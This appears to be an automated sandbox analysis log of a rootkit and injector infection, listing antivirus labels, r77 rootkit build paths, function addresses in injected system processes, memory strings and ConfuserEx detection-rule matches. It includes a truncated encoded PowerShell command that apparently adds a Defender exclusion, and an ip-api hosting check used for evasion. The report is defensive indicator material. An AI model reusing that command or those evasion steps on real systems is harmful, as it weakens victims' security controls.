Source: 22.0.nslookup.exe.140000000.2.unpack |
Avira: Label: TR/Injector.vwktt |
Source: 39.0.dllhost.exe.140000000.10.unpack |
Avira: Label: RKIT/Agent.avskt |
Source: 22.0.nslookup.exe.140000000.0.unpack |
Avira: Label: TR/Injector.vwktt |
Source: 22.0.nslookup.exe.140000000.8.unpack |
Avira: Label: TR/Injector.vwktt |
Source: 39.0.dllhost.exe.140000000.3.unpack |
Avira: Label: RKIT/Agent.avskt |
Source: 22.0.nslookup.exe.140000000.1.unpack |
Avira: Label: TR/Injector.vwktt |
Source: 39.0.dllhost.exe.140000000.4.unpack |
Avira: Label: RKIT/Agent.avskt |
Source: 22.0.nslookup.exe.140000000.5.unpack |
Avira: Label: TR/Injector.vwktt |
Source: 39.0.dllhost.exe.140000000.1.unpack |
Avira: Label: RKIT/Agent.avskt |
Source: 39.0.dllhost.exe.140000000.8.unpack |
Avira: Label: RKIT/Agent.avskt |
Source: 22.2.nslookup.exe.140000000.0.unpack |
Avira: Label: TR/Injector.vwktt |
Source: 39.0.dllhost.exe.140000000.5.unpack |
Avira: Label: RKIT/Agent.avskt |
Source: 39.2.dllhost.exe.140000000.0.unpack |
Avira: Label: RKIT/Agent.avskt |
Source: 39.0.dllhost.exe.140000000.12.unpack |
Avira: Label: RKIT/Agent.avskt |
Source: 22.0.nslookup.exe.140000000.6.unpack |
Avira: Label: TR/Injector.vwktt |
Source: 39.0.dllhost.exe.140000000.0.unpack |
Avira: Label: RKIT/Agent.avskt |
Source: 22.0.nslookup.exe.140000000.10.unpack |
Avira: Label: TR/Injector.vwktt |
Source: 39.0.dllhost.exe.140000000.6.unpack |
Avira: Label: RKIT/Agent.avskt |
Source: 22.0.nslookup.exe.140000000.12.unpack |
Avira: Label: TR/Injector.vwktt |
Source: 22.0.nslookup.exe.140000000.3.unpack |
Avira: Label: TR/Injector.vwktt |
Source: 22.0.nslookup.exe.140000000.4.unpack |
Avira: Label: TR/Injector.vwktt |
Source: 39.0.dllhost.exe.140000000.2.unpack |
Avira: Label: RKIT/Agent.avskt |
Source: |
Binary string: x64\Release\r77-x64.pdb source: svchost.exe |
Source: |
Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master\vs\x64\Release\Install.pdb source: 34432.exe, 00000004.00000002.371180159.000000001702D000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000002.361388892.0000000013A39000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000002.356979000.00000000039F5000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000002.360948518.0000000013998000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000003.333426645.000000001C445000.00000004.00000020.00020000.00000000.sdmp, nslookup.exe, nslookup.exe, 00000016.00000000.330232590.0000000140000000.00000040.00000400.00020000.00000000.sdmp, nslookup.exe, 00000016.00000000.329876550.0000000140000000.00000040.00000400.00020000.00000000.sdmp, nslookup.exe, 00000016.00000002.336319632.0000000140000000.00000040.00000400.00020000.00000000.sdmp |
Source: |
Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master\vs\Release\r77-x86.pdb source: powershell.exe, 00000019.00000002.430828592.000002C880212000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.462661214.000002C890203000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.461611768.000002C890060000.00000004.00000800.00020000.00000000.sdmp |
Source: |
Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master\vs\x64\Release\InstallService64.pdb source: powershell.exe, 00000019.00000002.430828592.000002C880212000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.462661214.000002C890203000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.463366324.000002C8902E9000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe |
Source: |
Binary string: x64.pdb source: svchost.exe |
Source: |
Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master\vs\Release\InstallService32.pdb source: powershell.exe, 00000019.00000002.462661214.000002C890203000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.461611768.000002C890060000.00000004.00000800.00020000.00000000.sdmp |
Source: |
Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master\vs\InstallStager\obj\x64\Release\InstallStager.pdb source: 34432.exe, 00000004.00000002.361388892.0000000013A39000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000002.360948518.0000000013998000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000002.356818562.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000002.356782565.0000000003991000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000003.333426645.000000001C445000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.468321947.000002C8EBC93000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: N\rootkit\r77-rootkit-master\vs\x64\Release\r77-x64.pdb source: svchost.exe |
Source: |
Binary string: C:\projects\dotnetzip-semverd\src\Zip\obj\Release\DotNetZip.pdb source: ChiefKeefofficialnaxyi_crypted(6).exe, 00000002.00000002.225232923.0000000000113000.00000004.00000010.00020000.00000000.sdmp, ChiefKeefofficialnaxyi_crypted(6).exe, 00000002.00000003.224694291.0000000002672000.00000040.00001000.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.505647974.0000000000402000.00000020.00000400.00020000.00000000.sdmp |
Source: |
Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master\vs\x64\Release\r77-x64.pdb source: svchost.exe |
Source: |
Binary string: RYPTOCOIN\rootkit\r77-rootkit-master\vs\x64\Release\r77-x64.pdb source: svchost.exe |
Source: C:\Users\user\Desktop\Install.exe |
Code function: 1_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, |
1_2_00405C49 |
Source: C:\Users\user\Desktop\Install.exe |
Code function: 1_2_00406873 FindFirstFileW,FindClose, |
1_2_00406873 |
Source: C:\Users\user\Desktop\Install.exe |
Code function: 1_2_0040290B FindFirstFileW, |
1_2_0040290B |
Source: C:\Windows\System32\nslookup.exe |
Code function: 22_2_0000000140006E1C FindFirstFileExW, |
22_2_0000000140006E1C |
Source: C:\Windows\System32\dllhost.exe |
Code function: 39_2_00000001400073C8 FindFirstFileExW, |
39_2_00000001400073C8 |
Source: C:\Windows\System32\winlogon.exe |
Code function: 42_2_000001AFDDD0D0E4 FindFirstFileExW, |
42_2_000001AFDDD0D0E4 |
Source: C:\Windows\System32\lsass.exe |
Code function: 44_2_00000240B2BBD0E4 FindFirstFileExW, |
44_2_00000240B2BBD0E4 |
Source: C:\Windows\System32\svchost.exe |
Code function: 47_2_000001CAF3D0D0E4 FindFirstFileExW, |
47_2_000001CAF3D0D0E4 |
Source: C:\Windows\System32\svchost.exe |
Code function: 49_2_000001B8BFF4D0E4 FindFirstFileExW, |
49_2_000001B8BFF4D0E4 |
Source: powershell.exe, 00000008.00000002.291719056.000001FF52214000.00000004.00000800.00020000.00000000.sdmp |
String found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Version, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:DefaultNoun, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:InstanceCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:StaticCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:CmdletAdapterPrivateData |
Source: powershell.exe, 00000008.00000002.291719056.000001FF52214000.00000004.00000800.00020000.00000000.sdmp |
String found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowEmptyCollection, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowEmptyString, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowNull, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateNotNull, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateNotNullOrEmpty, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateCount, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateLength, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateRange, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateSet, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Obsolete |
Source: powershell.exe, 00000008.00000002.291719056.000001FF52214000.00000004.00000800.00020000.00000000.sdmp |
String found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Type, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MaxValueQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:RegularQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ExcludeQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MinValueQuery |
Source: powershell.exe, 00000026.00000002.485582465.00000283A0A44000.00000004.00000800.00020000.00000000.sdmp |
String found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Version, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:DefaultNoun, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:InstanceCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:StaticCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:CmdletAdapterPrivateData0I |
Source: powershell.exe, 00000026.00000002.485582465.00000283A0A44000.00000004.00000800.00020000.00000000.sdmp |
String found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Type, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MaxValueQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:RegularQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ExcludeQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MinValueQueryux |
Source: powershell.exe, 00000008.00000002.303519748.000001FF69E80000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.467492973.000002C8EBA50000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.globalsign.net/root-r2.crl0 |
Source: powershell.exe, 00000026.00000003.472356728.00000283B87D2000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.mp |
Source: powershell.exe, 00000026.00000003.472356728.00000283B87D2000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.mpowershell-EncodedCommandQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHM |
Source: AppLaunch.exe, 00000005.00000002.512763531.0000000006D47000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.512163132.0000000006CE4000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://ip-api.com |
Source: AppLaunch.exe, 00000005.00000002.512163132.0000000006CE4000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://ip-api.com/line/?fields=hosting |
Source: AppLaunch.exe, 00000005.00000002.512163132.0000000006CE4000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://ip-api.com4Uk |
Source: Install.exe, 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmp, Install.exe, 00000001.00000000.217633196.000000000040A000.00000008.00000001.01000000.00000003.sdmp |
String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError |
Source: powershell.exe, 00000008.00000002.301149982.000001FF61EE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.461611768.000002C890060000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.497193020.00000283B0710000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000019.00000002.435620250.000002C8806DF000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000008.00000002.291719056.000001FF52214000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.485582465.00000283A0A44000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/ |
Source: 34432.exe, 00000004.00000002.356979000.00000000039F5000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.512163132.0000000006CE4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.288800846.000001FF51E81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.430121118.000002C880001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.477975029.00000283A06B1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000008.00000002.291719056.000001FF52214000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.485582465.00000283A0A44000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/wsdl/ |
Source: powershell.exe, 00000019.00000002.435620250.000002C8806DF000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: AppLaunch.exe, 00000005.00000002.505647974.0000000000402000.00000020.00000400.00020000.00000000.sdmp |
String found in binary or memory: http://www.codeplex.com/DotNetZip |
Source: powershell.exe, 00000026.00000002.497193020.00000283B0710000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000026.00000002.497193020.00000283B0710000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000026.00000002.497193020.00000283B0710000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000019.00000002.435620250.000002C8806DF000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000008.00000002.298759051.000001FF53502000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.299698983.000001FF5367C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.300217713.000001FF53864000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.493191066.00000283A1A2B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000003.422394060.00000283A2335000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000003.423315665.00000283A242E000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000008.00000002.301149982.000001FF61EE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.461611768.000002C890060000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.497193020.00000283B0710000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: C:\Users\user\Desktop\Install.exe |
Code function: 1_2_004056DE GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, |
1_2_004056DE |
Source: C:\Users\user\Desktop\Install.exe |
Code function: 1_2_0040755C |
1_2_0040755C |
Source: C:\Users\user\Desktop\Install.exe |
Code function: 1_2_00406D85 |
1_2_00406D85 |
Source: C:\Users\user\AppData\Roaming\34432.exe |
Code function: 4_2_00007FFF7E401C9B |
4_2_00007FFF7E401C9B |
Source: C:\Users\user\AppData\Roaming\34432.exe |
Code function: 4_2_00007FFF7E405C20 |
4_2_00007FFF7E405C20 |
Source: C:\Users\user\AppData\Roaming\34432.exe |
Code function: 4_2_00007FFF7E401CCC |
4_2_00007FFF7E401CCC |
Source: C:\Users\user\AppData\Roaming\34432.exe |
Code function: 4_2_00007FFF7E401D60 |
4_2_00007FFF7E401D60 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: 5_2_0532148E |
5_2_0532148E |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: 5_2_05327D90 |
5_2_05327D90 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: 5_2_05321DC1 |
5_2_05321DC1 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: 5_2_0532DF00 |
5_2_0532DF00 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: 5_2_0532BFA0 |
5_2_0532BFA0 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: 5_2_0532C870 |
5_2_0532C870 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: 5_2_05320868 |
5_2_05320868 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: 5_2_05320B48 |
5_2_05320B48 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: 5_2_05321587 |
5_2_05321587 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: 5_2_053220F8 |
5_2_053220F8 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: 5_2_0532BC58 |
5_2_0532BC58 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: 5_2_05321E71 |
5_2_05321E71 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: 5_2_05320B39 |
5_2_05320B39 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: 5_2_05320B82 |
5_2_05320B82 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: 5_2_05327A38 |
5_2_05327A38 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: 5_2_09417560 |
5_2_09417560 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: 5_2_09417570 |
5_2_09417570 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Code function: 8_2_00007FFF7E3F1958 |
8_2_00007FFF7E3F1958 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Code function: 8_2_00007FFF7E3F19B8 |
8_2_00007FFF7E3F19B8 |
Source: C:\Windows\System32\nslookup.exe |
Code function: 22_2_0000000140001000 |
22_2_0000000140001000 |
Source: C:\Windows\System32\nslookup.exe |
Code function: 22_2_00000001400011D0 |
22_2_00000001400011D0 |
Source: C:\Windows\System32\nslookup.exe |
Code function: 22_2_0000000140006C10 |
22_2_0000000140006C10 |
Source: C:\Windows\System32\nslookup.exe |
Code function: 22_2_0000000140005098 |
22_2_0000000140005098 |
Source: C:\Windows\System32\nslookup.exe |
Code function: 22_2_0000000140006E1C |
22_2_0000000140006E1C |
Source: C:\Windows\System32\nslookup.exe |
Code function: 22_2_000000014000AABC |
22_2_000000014000AABC |
Source: C:\Windows\System32\nslookup.exe |
Code function: 22_2_000000014000CAD8 |
22_2_000000014000CAD8 |
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe |
Code function: 30_2_00007FFF7E3F4640 |
30_2_00007FFF7E3F4640 |
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe |
Code function: 30_2_00007FFF7E3F1C9B |
30_2_00007FFF7E3F1C9B |
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe |
Code function: 30_2_00007FFF7E3F1CCC |
30_2_00007FFF7E3F1CCC |
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe |
Code function: 30_2_00007FFF7E3F1D60 |
30_2_00007FFF7E3F1D60 |
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe |
Code function: 33_2_00007FFF7E401C9B |
33_2_00007FFF7E401C9B |
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe |
Code function: 33_2_00007FFF7E401CCC |
33_2_00007FFF7E401CCC |
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe |
Code function: 33_2_00007FFF7E401D60 |
33_2_00007FFF7E401D60 |
Source: C:\Windows\System32\dllhost.exe |
Code function: 39_2_0000000140001000 |
39_2_0000000140001000 |
Source: C:\Windows\System32\dllhost.exe |
Code function: 39_2_0000000140001420 |
39_2_0000000140001420 |
Source: C:\Windows\System32\dllhost.exe |
Code function: 39_2_0000000140001430 |
39_2_0000000140001430 |
Source: C:\Windows\System32\dllhost.exe |
Code function: 39_2_000000014000558C |
39_2_000000014000558C |
Source: C:\Windows\System32\dllhost.exe |
Code function: 39_2_00000001400071BC |
39_2_00000001400071BC |
Source: C:\Windows\System32\dllhost.exe |
Code function: 39_2_000000014000B2CC |
39_2_000000014000B2CC |
Source: C:\Windows\System32\dllhost.exe |
Code function: 39_2_000000014000D2E8 |
39_2_000000014000D2E8 |
Source: C:\Windows\System32\dllhost.exe |
Code function: 39_2_00000001400073C8 |
39_2_00000001400073C8 |
Source: C:\Windows\System32\winlogon.exe |
Code function: 42_2_000001AFDDCDC4E4 |
42_2_000001AFDDCDC4E4 |
Source: C:\Windows\System32\winlogon.exe |
Code function: 42_2_000001AFDDCE2418 |
42_2_000001AFDDCE2418 |
Source: C:\Windows\System32\winlogon.exe |
Code function: 42_2_000001AFDDCD0800 |
42_2_000001AFDDCD0800 |
Source: C:\Windows\System32\winlogon.exe |
Code function: 42_2_000001AFDDCE0400 |
42_2_000001AFDDCE0400 |
Source: C:\Windows\System32\winlogon.exe |
Code function: 42_2_000001AFDDCDC2D8 |
42_2_000001AFDDCDC2D8 |
Source: C:\Windows\System32\winlogon.exe |
Code function: 42_2_000001AFDDCD1660 |
42_2_000001AFDDCD1660 |
Source: C:\Windows\System32\winlogon.exe |
Code function: 42_2_000001AFDDD01400 |
42_2_000001AFDDD01400 |
Source: C:\Windows\System32\winlogon.exe |
Code function: 42_2_000001AFDDD0D0E4 |
42_2_000001AFDDD0D0E4 |
Source: C:\Windows\System32\winlogon.exe |
Code function: 42_2_000001AFDDD13018 |
42_2_000001AFDDD13018 |
Source: C:\Windows\System32\winlogon.exe |
Code function: 42_2_000001AFDDD11000 |
42_2_000001AFDDD11000 |
Source: C:\Windows\System32\winlogon.exe |
Code function: 42_2_000001AFDDD0CED8 |
42_2_000001AFDDD0CED8 |
Source: C:\Windows\System32\winlogon.exe |
Code function: 42_2_000001AFDDD02260 |
42_2_000001AFDDD02260 |
Source: C:\Windows\System32\lsass.exe |
Code function: 44_2_00000240B2B8C4E4 |
44_2_00000240B2B8C4E4 |
Source: C:\Windows\System32\lsass.exe |
Code function: 44_2_00000240B2B8C2D8 |
44_2_00000240B2B8C2D8 |
Source: C:\Windows\System32\lsass.exe |
Code function: 44_2_00000240B2B81660 |
44_2_00000240B2B81660 |
Source: C:\Windows\System32\lsass.exe |
Code function: 44_2_00000240B2B92418 |
44_2_00000240B2B92418 |
Source: C:\Windows\System32\lsass.exe |
Code function: 44_2_00000240B2B80800 |
44_2_00000240B2B80800 |
Source: C:\Windows\System32\lsass.exe |
Code function: 44_2_00000240B2B90400 |
44_2_00000240B2B90400 |
Source: C:\Windows\System32\lsass.exe |
Code function: 44_2_00000240B2BBD0E4 |
44_2_00000240B2BBD0E4 |
Source: C:\Windows\System32\lsass.exe |
Code function: 44_2_00000240B2BBCED8 |
44_2_00000240B2BBCED8 |
Source: C:\Windows\System32\lsass.exe |
Code function: 44_2_00000240B2BB2260 |
44_2_00000240B2BB2260 |
Source: C:\Windows\System32\lsass.exe |
Code function: 44_2_00000240B2BC3018 |
44_2_00000240B2BC3018 |
Source: C:\Windows\System32\lsass.exe |
Code function: 44_2_00000240B2BB1400 |
44_2_00000240B2BB1400 |
Source: C:\Windows\System32\lsass.exe |
Code function: 44_2_00000240B2BC1000 |
44_2_00000240B2BC1000 |
Source: C:\Windows\System32\svchost.exe |
Code function: 47_2_000001CAF3CE2418 |
47_2_000001CAF3CE2418 |
Source: C:\Windows\System32\svchost.exe |
Code function: 47_2_000001CAF3CE0400 |
47_2_000001CAF3CE0400 |
Source: C:\Windows\System32\svchost.exe |
Code function: 47_2_000001CAF3CD0800 |
47_2_000001CAF3CD0800 |
Source: C:\Windows\System32\svchost.exe |
Code function: 47_2_000001CAF3CDC2D8 |
47_2_000001CAF3CDC2D8 |
Source: C:\Windows\System32\svchost.exe |
Code function: 47_2_000001CAF3CD1660 |
47_2_000001CAF3CD1660 |
Source: C:\Windows\System32\svchost.exe |
Code function: 47_2_000001CAF3CDC4E4 |
47_2_000001CAF3CDC4E4 |
Source: C:\Windows\System32\svchost.exe |
Code function: 47_2_000001CAF3D01400 |
47_2_000001CAF3D01400 |
Source: C:\Windows\System32\svchost.exe |
Code function: 47_2_000001CAF3D02260 |
47_2_000001CAF3D02260 |
Source: C:\Windows\System32\svchost.exe |
Code function: 47_2_000001CAF3D0D0E4 |
47_2_000001CAF3D0D0E4 |
Source: C:\Windows\System32\svchost.exe |
Code function: 47_2_000001CAF3D13018 |
47_2_000001CAF3D13018 |
Source: C:\Windows\System32\svchost.exe |
Code function: 47_2_000001CAF3D11000 |
47_2_000001CAF3D11000 |
Source: C:\Windows\System32\svchost.exe |
Code function: 47_2_000001CAF3D0CED8 |
47_2_000001CAF3D0CED8 |
Source: C:\Windows\System32\svchost.exe |
Code function: 49_2_000001B8BFF11660 |
49_2_000001B8BFF11660 |
Source: C:\Windows\System32\svchost.exe |
Code function: 49_2_000001B8BFF1C4E4 |
49_2_000001B8BFF1C4E4 |
Source: C:\Windows\System32\svchost.exe |
Code function: 49_2_000001B8BFF22418 |
49_2_000001B8BFF22418 |
Source: C:\Windows\System32\svchost.exe |
Code function: 49_2_000001B8BFF10800 |
49_2_000001B8BFF10800 |
Source: C:\Windows\System32\svchost.exe |
Code function: 49_2_000001B8BFF20400 |
49_2_000001B8BFF20400 |
Source: C:\Windows\System32\svchost.exe |
Code function: 49_2_000001B8BFF1C2D8 |
49_2_000001B8BFF1C2D8 |
Source: C:\Windows\System32\svchost.exe |
Code function: 49_2_000001B8BFF41400 |
49_2_000001B8BFF41400 |
Source: C:\Windows\System32\svchost.exe |
Code function: 49_2_000001B8BFF42260 |
49_2_000001B8BFF42260 |
Source: C:\Windows\System32\svchost.exe |
Code function: 49_2_000001B8BFF4D0E4 |
49_2_000001B8BFF4D0E4 |
Source: C:\Windows\System32\svchost.exe |
Code function: 49_2_000001B8BFF53018 |
49_2_000001B8BFF53018 |
Source: C:\Windows\System32\svchost.exe |
Code function: 49_2_000001B8BFF51000 |
49_2_000001B8BFF51000 |
Source: C:\Windows\System32\svchost.exe |
Code function: 49_2_000001B8BFF4CED8 |
49_2_000001B8BFF4CED8 |
Source: 33.2.chrome.exe.fa0000.0.unpack, type: UNPACKEDPE |
Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25 |
Source: 30.0.chrome.exe.20000.0.unpack, type: UNPACKEDPE |
Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25 |
Source: 30.2.chrome.exe.20000.0.unpack, type: UNPACKEDPE |
Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25 |
Source: 4.0.34432.exe.770000.0.unpack, type: UNPACKEDPE |
Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25 |
Source: 4.2.34432.exe.770000.0.unpack, type: UNPACKEDPE |
Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25 |
Source: 33.0.chrome.exe.fa0000.0.unpack, type: UNPACKEDPE |
Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25 |
Source: C:\Users\user\AppData\Roaming\34432.exe, type: DROPPED |
